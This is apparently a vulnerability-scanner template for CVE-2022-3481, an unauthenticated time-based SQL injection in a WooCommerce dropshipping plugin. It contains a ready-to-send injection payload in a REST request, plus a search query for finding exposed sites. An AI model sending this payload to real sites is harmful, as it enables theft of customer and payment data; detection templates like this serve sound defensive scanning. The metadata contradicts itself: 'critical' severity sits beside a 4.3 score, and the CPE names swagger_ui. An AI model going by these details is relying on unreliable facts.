id: CVE-2022-3481 info: name: NotificationX Dropshipping < 4.4 - SQL Injection author: ritikchaddha severity: critical description: | The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via a REST endpoint available to unauthenticated users, leading to a SQL injection impact: | Unauthenticated attackers can exploit time-based SQL injection through the REST endpoint to extract sensitive WooCommerce data including customer information, order details, and payment records. remediation: | Update NotificationX Dropshipping plugin to version 4.4 or later that properly sanitizes and escapes parameters in REST endpoints. reference: - https://wpscan.com/vulnerability/c5e395f8-257e-49eb-afbd-9c1e26045373 - https://nvd.nist.gov/vuln/detail/CVE-2022-3481 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2022-3481 cwe-id: CWE-20 epss-score: 0.03686 epss-percentile: 0.88577 cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:* metadata: max-request: 1 verified: true fofa-query: body="/wp-content/plugins/woocommerce-dropshipping" tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,woocommerce,notificationx,vkev,vuln http: - raw: - | @timeout: 30s POST /wp-json/woo-aliexpress/v1/product-sku HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"sku":"a\" AND (SELECT 42 FROM (SELECT(SLEEP(7)))wlHd)-- pOeU"} matchers: - type: dsl dsl: - 'duration>=7' - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains_all(body, "code\":", "message\":\"Product", "status\":400")' condition: and # digest: 4a0a0047304502206275cec32fbe1751bac37506152855ee67aa2c6ecaa317ec584ca8fe01230cf3022100f99dec6890f409f6b73cc853657b9e69fb10260c8e4aad5ed6293423856ea89f:922c64590222798bb761d5b6d8e72950